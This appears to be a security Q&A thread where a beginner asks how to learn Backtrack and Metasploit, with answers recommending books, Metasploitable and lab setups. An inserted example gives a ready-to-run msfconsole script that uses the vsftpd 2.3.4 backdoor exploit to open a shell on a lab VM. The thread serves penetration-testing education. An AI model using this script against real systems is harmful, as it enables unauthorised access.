
I have just downloaded Backtrack 5 R2 with Gnome and, while it looks cool, I don't really know where to start.

I see it comes with Metasploit but, to be blunt, I still don't really understand what Metasploit is.

A quick disclaimer, I'm a Windows guy with little experience with Linux.

I understand that I don't need Backtrack to use the tools that Backtrack comes with. Backtrack just makes this convenient. I can install any Linux distro and, after adding the relevant repositories, use apt-get install to install the tools. I also understand that I can get Metasploit for Windows, but get the feeling that it is probably a lot more useful on Linux.

I have a free weekend coming up, and am therefore asking if somebody could recommend a decent book that would bring me up to speed on Backtrack/Metasploit?

kalina
JMK
  • Well, it's only apt-get for package management on Debian-based distros; there are others, Red Hat/Fedora most well known. – ewanm89 Jul 13 '12 at 10:29

6 Answers

To be very honest, I feel that most of the books out there on Metasploit are outdated, as it gets updated very often.

To learn more about the two, I would first download Metasploitable. This is an old configuration of Ubuntu with security holes for learning purposes.

The Metasploit and Backtrack FAQs are good places to start. Learn what each tool does; Backtrack consists of hundreds of tools, most of which you will probably never use. Take a look at your situation, and find the appropriate tool to use. Google is your good friend here.

Metasploit is simply an exploitation framework. The beauty of it is the ability to combine different exploits with different payloads to adapt to different situations. Meterpreter is also an incredibly powerful shell from which to perform privilege escalation and other attacks once you have gained access.

Once you have cracked Metasploitable, there are many other vulnerable VMs to exploit; here is a link to a question I had asked which has suggestions for many good practice boxes.

The key to understanding Backtrack and Metasploit is simply using them and getting familiar with the commands. A basic understanding of Linux is of course needed, as many of the tasks in Backtrack are performed using the command line interface.

If you really want a book - this is highly recommended by others, although I have never actually read it.

I do not however, recommend installing the repositories on another OS unless it is really necessary. Why not use something that just works? Backtrack's theme is very cool to boot.

  • The book referenced above is excellent and I'd highly recommend it. It's easy to read and contains so much goodness. – Mark Hillick Jul 13 '12 at 10:48
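The exploit/payload split described in the answer above, shown as an msfconsole resource script against a Metasploitable 2 VM. This is an added example, not part of the original post or of the Metasploit project's own documentation. The target and attacker addresses are constructed, and the choice of module (the vsftpd 2.3.4 backdoor exploit that ships with Metasploit, one of the services Metasploitable 2 is built to expose) is an assumption; nothing on the page names it.

```msf
# metasploitable.rc -- added example, not from the original post.
# Run with:  msfconsole -q -r metasploitable.rc
# Assumed lab (constructed, not from the page): Metasploitable 2 at
# 192.168.56.101 on a host-only network, attacker VM at 192.168.56.1.

# 1. Choose the exploit. The exploit only delivers; it does not decide
#    what runs on the target afterwards.
use exploit/unix/ftp/vsftpd_234_backdoor

# 2. List the payloads compatible with this exploit. Swapping one for
#    another without touching the exploit is the "combine exploits with
#    payloads" idea the answer describes. This module only supports
#    command-shell payloads, so a plain interactive shell is selected.
show payloads
set PAYLOAD cmd/unix/interact

# 3. Point it at the lab target (never at anything you do not own).
set RHOSTS 192.168.56.101

# 4. Review every option before firing; a missing or wrong option is the
#    most common reason an exploit silently does nothing.
show options

# 5. Fire. On success msfconsole opens a command shell session on the
#    target; type `background` to return to the console and
#    `sessions -l` / `sessions -i <id>` to list and re-enter sessions.
exploit
```

The value of doing it this way rather than typing commands by hand is repeatability: change `RHOSTS` or `PAYLOAD` and re-run the script, and you learn which parts of an attack are the exploit's job and which are the payload's.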

Congratulations JMK, both of us are exactly in the same boat! You may want to check a few questions I have asked on this site about using Metasploit.

In addition to the excellent answers by @Terry-chia and others, I wish to add that one excellent reference which I found for Metasploit is Metasploit unleashed by Offensivesecurity.com. These guys also offer some excellent (paid) online courses, one of them being Penetration with BackTrack- but that is far from a beginner's course and don't think about it for a few months (years?) at least!

I also understand that I can get Metasploit for Windows, but get the feeling that it is probably a lot more useful on Linux.

Your feelings are very right. I also happen to be a 'Windows guy' with little experience with Linux, but trust me it is best to learn on Linux, or rather on BT itself.

BT is nothing but a Linux distro, so I can't really suggest any books for it. You will surely not need all the tools with which BT comes, at least not at your beginning stage.

Disclaimer: I am in no way associated with offensivesecurity.com - just a fan of their good quality work!

pnp

Metasploitable was recently upgraded - here's the link. This newer version is more stable and includes several updates afaik.

So that you don't nuke something permanently, I'd recommend first playing with Backtrack on a USB key as live install. Here's a good how-to link from the BT5 wiki.

Mark Hillick
  • Why the live CD over a VM? Thanks for the link to the updated Metasploitable, I didn't even realise it existed. :P Updated my answer with the new link. –  Jul 13 '12 at 10:55
  • Personal preference for recommending to folk just starting off (especially folk without Linux experience), so less can go wrong. Additionally, for certain pen testing consignments, you have to be careful with what data you leave behind or what you can bring in or out. Getting into the habit of using a usb key (preferably persistent boot) is good practice. – Mark Hillick Jul 13 '12 at 11:00
  • I would think though, that for learning purposes, a VM would be more appropriate as it is easy to set up a multi-host testing environment with a single computer. For example, my computer can run 10-20 VMs at the same time, making it decently easy to set up a networked environment to practice on. I do agree with the live CD (or a laptop that gets securely erased every time) for pen testing jobs though. –  Jul 13 '12 at 11:03
  • Yep, true but you can have the VM instance boot from the USB also. There's no right or wrong, personal preference. I use the VM option a lot also. – Mark Hillick Jul 13 '12 at 11:06

The book Metasploit: The Penetration Tester's Guide was quite good (http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X). It was written by people very close to the project (the creator of SET and the creator of BackTrack, to name two) and the foreword was written by HD Moore, the creator of Metasploit. It is certainly not out of date, as most of the core stuff mentioned in the book has not changed much. Plus, the book also covers Fast-Track and SET. As mentioned elsewhere, Metasploit Unleashed is also quite informative.

I second Metasploit: The Penetration Tester's Guide. It actually has some material anybody interested in pentesting should know prior to running the SW. Plus, it also discusses PTES, which is a good foundation any new pentester should explore.

Plus, most of the authors frequent security conferences and are rather friendly.

http://www.pentest-standard.org/index.php/Main_Page


I realize I am new to the site but I have dabbled in Security Research and Pentesting. As many have posted, "Metasploit: The Penetration Tester's Guide" would probably be your best bet for learning Metasploit. However, "The Basics of Hacking and Penetration Testing" by Syngress and "Gray Hat Hacking: The Ethical Hacker's Handbook" by McGraw-Hill are good books for getting an intro to some of the other tools that Backtrack offers. However if you're trying to avoid purchasing, then exploit-db.com has some whitepapers that will give you the "essentials" for Metasploit and other popular tools.